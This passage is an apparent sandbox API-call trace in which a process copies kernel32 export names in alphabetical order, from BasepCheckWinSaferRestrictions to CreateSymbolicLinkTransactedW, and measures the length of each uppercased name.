returned="BasepCheckWinSaferRestrictions" [0080.338] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.338] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.338] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.338] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.338] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.338] lstrlenA (lpString="BEEP") returned 4 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.339] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.339] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.339] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.339] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.339] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.339] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.339] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.339] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.339] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.339] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.339] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.339] lstrlenA (lpString="CANCELIO") returned 8 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.339] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.339] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.339] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.339] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.339] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.339] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.339] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.339] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.340] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.340] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.340] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.340] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.340] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.340] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.340] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.340] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.340] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.340] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.340] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.340] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.340] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.340] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.340] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.340] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.340] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.340] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.340] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.341] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.341] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.341] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.341] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.341] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.341] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.341] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.341] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.341] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.341] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.341] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.341] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.341] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.341] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.341] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.341] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.341] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.341] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.341] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.342] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.342] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.342] lstrlenA (lpString="COPYFILEA") returned 9 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.342] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.342] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.342] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.342] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.342] lstrlenA (lpString="COPYFILEW") returned 9 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.342] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.342] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.342] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.342] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.342] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.342] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.342] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.342] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.342] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.342] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.342] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.342] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.343] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.343] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.343] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.343] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.343] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.343] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.343] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.343] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.343] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.343] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.343] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.343] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.343] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.343] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.343] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.343] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.343] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.343] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.343] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.343] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.344] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.344] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.344] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.344] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.344] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.344] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.344] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.344] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.344] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.344] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.344] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.344] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.344] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.344] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.344] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.344] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.344] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.344] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.344] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.345] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.345] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.345] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.345] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.345] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.345] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.345] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.345] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.345] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.345] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.345] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.345] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.345] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.345] 